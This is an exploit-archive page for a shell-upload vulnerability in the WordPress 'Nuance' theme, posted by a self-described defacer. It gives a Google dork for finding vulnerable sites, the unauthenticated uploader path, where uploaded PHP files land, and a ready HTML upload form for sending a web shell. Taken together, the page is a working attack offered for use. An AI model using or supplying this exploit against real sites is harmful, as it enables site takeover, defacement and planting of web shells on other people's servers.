Home / exploits Wordpress Themes Nunace Shell Upload Vulnerability CSRF
Posted on 30 November -0001
<HTML><HEAD><TITLE>Wordpress Themes Nunace Shell Upload Vulnerability | CSRF</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>################################################################################# # Wordpress Themes Nuance Shell Upload Vulnerability | CSRF # Author : Berandal # Google Dork: inurl:/wp-content/themes/nuance/ # Tested on: Win 7, Linux # Blog : http://www.maxteroit.com/ ################################################################################# +-+-+-+-+-+-+-+-+ |B|e|r|a|n|d|a|l| +-+-+-+-+-+-+-+-+ # [!] Exploit : http://127.0.0.1/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php # [!] File Location : http://127.0.0.1/wp-content/uploads/[year]/[month]/filename.php ################################################################################# #[*] CSRF: ################################################################################# <html> <body> form enctype="multipart/form-data" action="http://127.0.0.1/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php" method="post"> <input type="jpg" name="url" value="./" /><br /> Please choose a file: <input name="qqfile" type="file" /><br /> <input type="submit" value="Upload" /> </form> </body> </html> ################################################################################# # [*] ABOUT: ################################################################################# # Facebook: https://www.facebook.com/owlsquad.id # Twitter: https://www.twitter.com/id_berandal # Greetz : All Official Member OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer. #################################################################################</BODY></HTML>
